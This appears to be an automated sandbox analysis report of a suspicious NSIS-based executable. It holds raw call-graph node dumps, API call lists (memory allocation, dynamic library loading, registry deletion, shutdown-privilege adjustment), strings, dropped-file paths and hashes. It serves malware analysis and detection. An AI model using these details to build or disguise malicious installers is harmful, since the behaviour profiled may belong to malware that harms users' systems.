700e1c12 lstrcpyA 4502->4512 4516 700e1fb7 4502->4516 4502->4517 4522 700e1ef9 GlobalFree 4502->4522 4523 700e1224 2 API calls 4502->4523 4592 700e1534 GlobalSize GlobalAlloc 4502->4592 4503->4502 4506 700e2113 GetModuleHandleA 4504->4506 4504->4517 4505->4517 4525 700e208c lstrcpyA 4505->4525 4509 700e2139 4506->4509 4510 700e2124 LoadLibraryA 4506->4510 4507->4512 4508->4502 4598 700e15c2 GetProcAddress 4509->4598 4510->4509 4510->4517 4512->4502 4513->4517 4594 700e1224 4513->4594 4514 700e214b 4515 700e218a 4514->4515 4526 700e2174 GetProcAddress 4514->4526 4515->4517 4520 700e2197 lstrlenA 4515->4520 4597 700e1215 GlobalAlloc 4516->4597 4517->4454 4599 700e15c2 GetProcAddress 4520->4599 4522->4502 4523->4502 4525->4517 4526->4515 4527 700e1fbf 4527->4454 4529 700e230a 4528->4529 4531 700e2446 GlobalFree 4529->4531 4533 700e23b8 GlobalAlloc MultiByteToWideChar 4529->4533 4535 700e2405 4529->4535 4536 700e1224 GlobalAlloc lstrcpynA 4529->4536 4601 700e12ad 4529->4601 4531->4529 4532 700e1730 4531->4532 4532->4462 4532->4463 4532->4470 4534 700e23e4 GlobalAlloc 4533->4534 4533->4535 4537 700e23fc GlobalFree 4534->4537 4535->4531 4605 700e2646 4535->4605 4536->4529 4537->4531 4541 700e2a4a 4539->4541 4540 700e2aef VirtualAllocEx 4544 700e2b0d 4540->4544 4541->4540 4543 700e2bd9 4543->4462 4608 700e29e4 4544->4608 4546 700e22c4 4545->4546 4547 700e22cf GlobalAlloc 4546->4547 4548 700e1729 4546->4548 4547->4546 4548->4456 4553 700e26e2 4549->4553 4550 700e277d GlobalAlloc 4554 700e27a0 4550->4554 4551 700e2790 4552 700e2796 GlobalSize 4551->4552 4551->4554 4552->4554 4553->4550 4553->4551 4554->4482 4556 700e2cce 4555->4556 4557 700e2d0e GlobalFree 4556->4557 4612 700e1215 GlobalAlloc 4558->4612 4560 700e2598 WideCharToMultiByte 4561 700e24e4 4560->4561 4561->4560 4562 700e2574 StringFromGUID2 WideCharToMultiByte 4561->4562 4563 700e2563 lstrcpynA 4561->4563 4564 700e25b9 wsprintfA 4561->4564 4565 700e25dd GlobalFree 4561->4565 4566 700e2617 GlobalFree 4561->4566 4567 700e1266 2 API calls 4561->4567 4613 700e12d1 4561->4613 4562->4561 4563->4561 4564->4561 4565->4561 4566->4471 4567->4561 4617 700e1215 GlobalAlloc 4569->4617 4571 700e155e 4572 700e156b 2 API calls 4571->4572 4573 700e1568 4572->4573 4574 700e1266 4573->4574 4575 700e126f GlobalAlloc lstrcpynA 4574->4575 4576 700e12a8 GlobalFree 4574->4576 4575->4576 4576->4480 4578 700e1577 wsprintfA 4577->4578 4579 700e15a4 lstrcpyA 4577->4579 4582 700e15bd 4578->4582 4579->4582 4582->4483 4584 700e24ac 4583->4584 4585 700e17ef 4583->4585 4584->4585 4586 700e24c5 GlobalFree 4584->4586 4585->4490 4585->4491 4586->4584 4588 700e1266 2 API calls 4587->4588 4589 700e1503 4588->4589 4589->4484 4590->4498 4591->4502 4593 700e1552 4592->4593 4593->4502 4600 700e1215 GlobalAlloc 4594->4600 4596 700e1233 lstrcpynA 4596->4517 4597->4527 4598->4514 4599->4517 4600->4596 4602 700e12b4 4601->4602 4603 700e1224 2 API calls 4602->4603 4604 700e12cf 4603->4604 4604->4529 4606 700e26aa 4605->4606 4607 700e2654 VirtualAlloc 4605->4607 4606->4535 4607->4606 4609 700e29ef 4608->4609 4610 700e29ff 4609->4610 4611 700e29f4 GetLastError 4609->4611 4610->4543 4611->4610 4612->4561 4614 700e12da 4613->4614 4615 700e12f9 4613->4615 4614->4615 4616 700e12e0 lstrcpyA 4614->4616 4615->4561 4616->4615 4617->4571 4618 40159d 4619 402bce 17 API calls 4618->4619 4620 4015a4 SetFileAttributesA 4619->4620 4621 4015b6 4620->4621 5421 40149d 5422 402387 5421->5422 5423 4014ab PostQuitMessage 5421->5423 5423->5422 5424 401a1e 5425 402bce 17 API calls 5424->5425 5426 401a27 ExpandEnvironmentStringsA 5425->5426 5427 401a3b 5426->5427 5429 401a4e 5426->5429 5428 401a40 lstrcmpA 5427->5428 5427->5429 5428->5429 4622 40171f 4623 402bce 17 API calls 4622->4623 4624 401726 SearchPathA 4623->4624 4625 401741 4624->4625 5435 401d1f 5436 402bac 17 API calls 5435->5436 5437 401d26 5436->5437 5438 402bac 17 API calls 5437->5438 5439 401d32 GetDlgItem 5438->5439 5440 402620 5439->5440 5441 700e15d1 5442 700e14bb GlobalFree 5441->5442 5444 700e15e9 5442->5444 5443 700e162f GlobalFree 5444->5443 5445 700e1604 5444->5445 5446 700e161b VirtualFree 5444->5446 5445->5443 5446->5443 4633 402421 4634 402453 4633->4634 4635 402428 4633->4635 4636 402bce 17 API calls 4634->4636 4637 402c0e 17 API calls 4635->4637 4638 40245a 4636->4638 4639 40242f 4637->4639 4645 402c8c 4638->4645 4641 402439 4639->4641 4644 402467 4639->4644 4642 402bce 17 API calls 4641->4642 4643 402440 RegDeleteValueA RegCloseKey 4642->4643 4643->4644 4646 402c9f 4645->4646 4648 402c98 4645->4648 4646->4648 4649 402cd0 4646->4649 4648->4644 4650 405f7d RegOpenKeyExA 4649->4650 4651 402cfe 4650->4651 4652 402db3 4651->4652 4653 402d08 4651->4653 4652->4648 4654 402d0e RegEnumValueA 4653->4654 4663 402d31 4653->4663 4655 402d98 RegCloseKey 4654->4655 4654->4663 4655->4652 4656 402d6d RegEnumKeyA 4657 402d76 RegCloseKey 4656->4657 4656->4663 4658 406500 5 API calls 4657->4658 4659 402d86 4658->4659 4661 402da8 4659->4661 4662 402d8a RegDeleteKeyA 4659->4662 4660 402cd0 6 API calls 4660->4663 4661->4652 4662->4652 4663->4655 4663->4656 4663->4657 4663->4660 4664 4027a1 4665 402bce 17 API calls 4664->4665 4666 4027a8 FindFirstFileA 4665->4666 4667 4027cb 4666->4667 4671 4027bb 4666->4671 4668 4027d2 4667->4668 4672 406055 wsprintfA 4667->4672 4673 4060f7 lstrcpynA 4668->4673 4672->4668 4673->4671 5447 402626 5448 40262b 5447->5448 5449 40263f 5447->5449 5450 402bac 17 API calls 5448->5450 5451 402bce 17 API calls 5449->5451 5453 402634 5450->5453 5452 402646 lstrlenA 5451->5452 5452->5453 5454 405d37 WriteFile 5453->5454 5455 402668 5453->5455 5454->5455 5456 403ca7 5457 403dfa 5456->5457 5458 403cbf 5456->5458 5460 403e4b 5457->5460 5461 403e0b GetDlgItem GetDlgItem 5457->5461 5458->5457 5459 403ccb 5458->5459 5463 403cd6 SetWindowPos 5459->5463 5464 403ce9 5459->5464 5462 403ea5 5460->5462 5473 401389 2 API calls 5460->5473 5465 40417b 18 API calls 5461->5465 5467 4041c7 SendMessageA 5462->5467 5487 403df5 5462->5487 5463->5464 5468 403d06 5464->5468 5469 403cee ShowWindow 5464->5469 5466 403e35 SetClassLongA 5465->5466 5470 40140b 2 API calls 5466->5470 5493 403eb7 5467->5493 5471 403d28 5468->5471 5472 403d0e DestroyWindow 5468->5472 5469->5468 5470->5460 5474 403d2d SetWindowLongA 5471->5474 5475 403d3e 5471->5475 5524 404104 5472->5524 5476 403e7d 5473->5476 5474->5487 5478 403db5 5475->5478 5479 403d4a GetDlgItem 5475->5479 5476->5462 5480 403e81 SendMessageA 5476->5480 5477 404106 DestroyWindow EndDialog 5477->5524 5485 4041e2 8 API calls 5478->5485 5483 403d7a 5479->5483 5484 403d5d SendMessageA IsWindowEnabled 5479->5484 5480->5487 5481 40140b 2 API calls 5481->5493 5482 404135 ShowWindow 5482->5487 5488 403d87 5483->5488 5491 403dce SendMessageA 5483->5491 5492 403d9a 5483->5492 5498 403d7f 5483->5498 5484->5483 5484->5487 5485->5487 5486 40618a 17 API calls 5486->5493 5488->5491 5488->5498 5489 404154 SendMessageA 5489->5478 5490 40417b 18 API calls 5490->5493 5491->5478 5494 403da2 5492->5494 5495 403db7 5492->5495 5493->5477 5493->5481 5493->5486 5493->5487 5493->5490 5499 40417b 18 API calls 5493->5499 5515 404046 DestroyWindow 5493->5515 5497 40140b 2 API calls 5494->5497 5496 40140b 2 API calls 5495->5496 5496->5498 5497->5498 5498->5478 5498->5489 5500 403f32 GetDlgItem 5499->5500 5501 403f47 5500->5501 5502 403f4f ShowWindow EnableWindow 5500->5502 5501->5502 5525 40419d EnableWindow 5502->5525 5504 403f79 EnableWindow 5508 403f8d 5504->5508 5505 403f92 GetSystemMenu EnableMenuItem SendMessageA 5506 403fc2 SendMessageA 5505->5506 5505->5508 5506->5508 5508->5505 5509 403c88 18 API calls 5508->5509 5526 4041b0 SendMessageA 5508->5526 5527 4060f7 lstrcpynA 5508->5527 5509->5508 5511 403ff1 lstrlenA 5512 40618a 17 API calls 5511->5512 5513 404002 SetWindowTextA 5512->5513 5514 401389 2 API calls 5513->5514 5514->5493 5516 404060 CreateDialogParamA 5515->5516 5515->5524 5517 404093 5516->5517 5516->5524 5518 40417b 18 API calls 5517->5518 5519 40409e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5518->5519 5520 401389 2 API calls 5519->5520 5521 4040e4 5520->5521 5521->5487 5522 4040ec ShowWindow 5521->5522 5523 4041c7 SendMessageA 5522->5523 5523->5524 5524->5482 5524->5487 5525->5504 5526->5508 5527->5511 4706 40272b 4707 402732 4706->4707 4708 4029aa 4706->4708 4709 402bac 17 API calls 4707->4709 4710 402739 4709->4710 4711 402748 SetFilePointer 4710->4711 4711->4708 4712 402758 4711->4712 4714 406055 wsprintfA 4712->4714 4714->4708 5528 700e2be3 5529 700e2bfb 5528->5529 5530 700e1534 2 API calls 5529->5530 5531 700e2c16 5530->5531 4725 401c2e 4726 402bac 17 API calls 4725->4726 4727 401c35 4726->4727 4728 402bac 17 API calls 4727->4728 4729 401c42 4728->4729 4730 402bce 17 API calls 4729->4730 4733 401c57 4729->4733 4730->4733 4731 401c72 4735 402bac 17 API calls 4731->4735 4732 401cbe 4736 402bce 17 API calls 4732->4736 4734 402bce 17 API calls 4733->4734 4737 401c67 4733->4737 4734->4737 4738 401c77 4735->4738 4739 401cc3 4736->4739 4737->4731 4737->4732 4740 402bac 17 API calls 4738->4740 4741 402bce 17 API calls 4739->4741 4742 401c83 4740->4742 4743 401ccc FindWindowExA 4741->4743 4744 401c90 SendMessageTimeoutA 4742->4744 4745 401cae SendMessageA 4742->4745 4746 401cea 4743->4746 4744->4746 4745->4746 5532 700e10e0 5535 700e110e 5532->5535 5533 700e11c4 GlobalFree 5534 700e12ad 2 API calls 5534->5535 5535->5533 5535->5534 5536 700e11c3 5535->5536 5537 700e1266 2 API calls 5535->5537 5538 700e1155 GlobalAlloc 5535->5538 5539 700e11ea GlobalFree 5535->5539 5540 700e12d1 lstrcpyA 5535->5540 5541 700e11b1 GlobalFree 5535->5541 5536->5533 5537->5541 5538->5535 5539->5535 5540->5535 5541->5535 5542 4042b1 lstrcpynA lstrlenA 4756 401e35 GetDC 4757 402bac 17 API calls 4756->4757 4758 401e47 GetDeviceCaps MulDiv ReleaseDC 4757->4758 4759 402bac 17 API calls 4758->4759 4760 401e78 4759->4760 4761 40618a 17 API calls 4760->4761 4762 401eb5 CreateFontIndirectA 4761->4762 4763 402620 4762->4763 5543 4014b7 5544 4014bd 5543->5544 5545 401389 2 API calls 5544->5545 5546 4014c5 5545->5546 5547 402dba 5548 402de2 5547->5548 5549 402dc9 SetTimer 5547->5549 5550 402e37 5548->5550 5551 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5548->5551 5549->5548 5551->5550 4810 4015bb 4811 402bce 17 API calls 4810->4811 4812 4015c2 4811->4812 4813 405b28 4 API calls 4812->4813 4814 4015ca 4813->4814 4815 401624 4814->4815 4816 405aba CharNextA 4814->4816 4823 405761 2 API calls 4814->4823 4824 40577e 5 API calls 4814->4824 4826 40160c GetFileAttributesA 4814->4826 4828 4056e4 4 API calls 4814->4828 4817 401652 4815->4817 4818 401629 4815->4818 4816->4814 4820 401423 24 API calls 4817->4820 4819 401423 24 API calls 4818->4819 4821 401630 4819->4821 4827 40164a 4820->4827 4829 4060f7 lstrcpynA 4821->4829 4823->4814 4824->4814 4825 40163b SetCurrentDirectoryA 4825->4827 4826->4814 4828->4814 4829->4825 5552 4016bb 5553 402bce 17 API calls 5552->5553 5554 4016c1 GetFullPathNameA 5553->5554 5557 4016d8 5554->5557 5561 4016f9 5554->5561 5555 402a5a 5556 40170d GetShortPathNameA 5556->5555 5558 40646b 2 API calls 5557->5558 5557->5561 5559 4016e9 5558->5559 5559->5561 5562 4060f7 lstrcpynA 5559->5562 5561->5555 5561->5556 5562->5561

                                                                          Executed Functions

                                                                          Function 00403348 Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 366stringcomfileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 403348-403387 SetErrorMode GetVersion 1 403389-403391 call 406500 0->1 2 40339a 0->2 1->2 8 403393 1->8 4 40339f-4033b2 call 406492 lstrlenA 2->4 9 4033b4-4033d0 call 406500 * 3 4->9 8->2 16 4033e1-40343f #17 OleInitialize SHGetFileInfoA call 4060f7 GetCommandLineA call 4060f7 9->16 17 4033d2-4033d8 9->17 24 403441-403446 16->24 25 40344b-403460 call 405aba CharNextA 16->25 17->16 22 4033da 17->22 22->16 24->25 28 403525-403529 25->28 29 403465-403468 28->29 30 40352f 28->30 31 403470-403478 29->31 32 40346a-40346e 29->32 33 403542-40355c GetTempPathA call 403317 30->33 34 403480-403483 31->34 35 40347a-40347b 31->35 32->31 32->32 43 4035b4-4035ce DeleteFileA call 402ea1 33->43 44 40355e-40357c GetWindowsDirectoryA lstrcatA call 403317 33->44 37 403515-403522 call 405aba 34->37 38 403489-40348d 34->38 35->34 37->28 56 403524 37->56 41 4034a5-4034d2 38->41 42 40348f-403495 38->42 45 4034d4-4034da 41->45 46 4034e5-403513 41->46 50 403497-403499 42->50 51 40349b 42->51 59 403662-403672 call 403830 OleUninitialize 43->59 60 4035d4-4035da 43->60 44->43 58 40357e-4035ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403317 44->58 52 4034e0 45->52 53 4034dc-4034de 45->53 46->37 55 403531-40353d call 4060f7 46->55 50->41 50->51 51->41 52->46 53->46 53->52 55->33 56->28 58->43 58->59 72 403796-40379c 59->72 73 403678-403688 call 405813 ExitProcess 59->73 63 403652-403659 call 40390a 60->63 64 4035dc-4035e7 call 405aba 60->64 70 40365e 63->70 76 4035e9-403612 64->76 77 40361d-403627 64->77 70->59 74 403818-403820 72->74 75 40379e-4037b7 GetCurrentProcess OpenProcessToken 72->75 85 403822 74->85 86 403826-40382a ExitProcess 74->86 82 4037e9-4037f7 call 406500 75->82 83 4037b9-4037e3 LookupPrivilegeValueA AdjustTokenPrivileges 75->83 84 403614-403616 76->84 79 403629-403636 call 405b7d 77->79 80 40368e-4036a2 call 40577e lstrcatA 77->80 79->59 94 403638-40364e call 4060f7 * 2 79->94 95 4036a4-4036aa lstrcatA 80->95 96 4036af-4036c9 lstrcatA lstrcmpiA 80->96 97 403805-40380f ExitWindowsEx 82->97 98 4037f9-403803 82->98 83->82 84->77 90 403618-40361b 84->90 85->86 90->77 90->84 94->63 95->96 96->59 100 4036cb-4036ce 96->100 97->74 101 403811-403813 call 40140b 97->101 98->97 98->101 103 4036d0-4036d5 call 4056e4 100->103 104 4036d7 call 405761 100->104 101->74 112 4036dc-4036e9 SetCurrentDirectoryA 103->112 104->112 113 4036f6-40371e call 4060f7 112->113 114 4036eb-4036f1 call 4060f7 112->114 118 403724-403740 call 40618a DeleteFileA 113->118 114->113 121 403781-403788 118->121 122 403742-403752 CopyFileA 118->122 121->118 124 40378a-403791 call 405ed6 121->124 122->121 123 403754-403774 call 405ed6 call 40618a call 405796 122->123 123->121 133 403776-40377d CloseHandle 123->133 124->59 133->121
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE ref: 0040336D
                                                                          • GetVersion.KERNEL32 ref: 00403373
                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                                          • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                                          • OleInitialize.OLE32(00000000), ref: 004033E9
                                                                          • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                                          • GetCommandLineA.KERNEL32(datastrrelsers Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Osb7hkGfAb.exe",00000020,"C:\Users\user\Desktop\Osb7hkGfAb.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                                          • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                            • Part of subcall function 0040390A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,774D3410), ref: 004039FA
                                                                            • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                            • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                            • Part of subcall function 0040390A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                                            • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                            • Part of subcall function 00403830: CloseHandle.KERNEL32(000002E8,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                                          • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                                          • ExitProcess.KERNEL32 ref: 00403688
                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                                          • ExitProcess.KERNEL32 ref: 0040382A
                                                                            • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                          • String ID: "$"C:\Users\user\Desktop\Osb7hkGfAb.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Osb7hkGfAb.exe$C:\Users\user\tranchet$C:\Users\user\tranchet\Trykmaalere$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KNw$datastrrelsers Setup$~nsu
                                                                          • API String ID: 3776617018-3656372189
                                                                          • Opcode ID: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                                          • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                                          • Opcode Fuzzy Hash: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                                          • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                                          Function 004058BF Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 337 4058bf-4058e5 call 405b7d 340 4058e7-4058f9 DeleteFileA 337->340 341 4058fe-405905 337->341 342 405a88-405a8c 340->342 343 405907-405909 341->343 344 405918-405928 call 4060f7 341->344 345 405a36-405a3b 343->345 346 40590f-405912 343->346 350 405937-405938 call 405ad6 344->350 351 40592a-405935 lstrcatA 344->351 345->342 349 405a3d-405a40 345->349 346->344 346->345 352 405a42-405a48 349->352 353 405a4a-405a52 call 40646b 349->353 355 40593d-405940 350->355 351->355 352->342 353->342 360 405a54-405a68 call 405a8f call 405877 353->360 358 405942-405949 355->358 359 40594b-405951 lstrcatA 355->359 358->359 361 405956-405974 lstrlenA FindFirstFileA 358->361 359->361 376 405a80-405a83 call 40521e 360->376 377 405a6a-405a6d 360->377 363 40597a-405991 call 405aba 361->363 364 405a2c-405a30 361->364 370 405993-405997 363->370 371 40599c-40599f 363->371 364->345 366 405a32 364->366 366->345 370->371 373 405999 370->373 374 4059a1-4059a6 371->374 375 4059b2-4059c0 call 4060f7 371->375 373->371 378 4059a8-4059aa 374->378 379 405a0b-405a1d FindNextFileA 374->379 387 4059c2-4059ca 375->387 388 4059d7-4059e2 call 405877 375->388 376->342 377->352 381 405a6f-405a7e call 40521e call 405ed6 377->381 378->375 383 4059ac-4059b0 378->383 379->363 385 405a23-405a26 FindClose 379->385 381->342 383->375 383->379 385->364 387->379 390 4059cc-4059d5 call 4058bf 387->390 396 405a03-405a06 call 40521e 388->396 397 4059e4-4059e7 388->397 390->379 396->379 399 4059e9-4059f9 call 40521e call 405ed6 397->399 400 4059fb-405a01 397->400 399->379 400->379
                                                                          APIs
                                                                          • DeleteFileA.KERNELBASE(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                                          • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                                          • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                                          • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                                          • FindFirstFileA.KERNELBASE(0042B898,?,?,?,0040A014,?,0042B898,?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                                          • FindClose.KERNEL32(00000000), ref: 00405A26
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                                          • "C:\Users\user\Desktop\Osb7hkGfAb.exe", xrefs: 004058BF
                                                                          • \*.*, xrefs: 0040592A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                          • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                          • API String ID: 2035342205-3706426567
                                                                          • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                          • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                                          • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                          • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                                          Function 0040216B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                          Strings
                                                                          • C:\Users\user\tranchet\Trykmaalere, xrefs: 00402230
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                          • String ID: C:\Users\user\tranchet\Trykmaalere
                                                                          • API String ID: 123533781-448873956
                                                                          • Opcode ID: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                                          • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                                          • Opcode Fuzzy Hash: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                                          • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                                          Function 0040646B Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
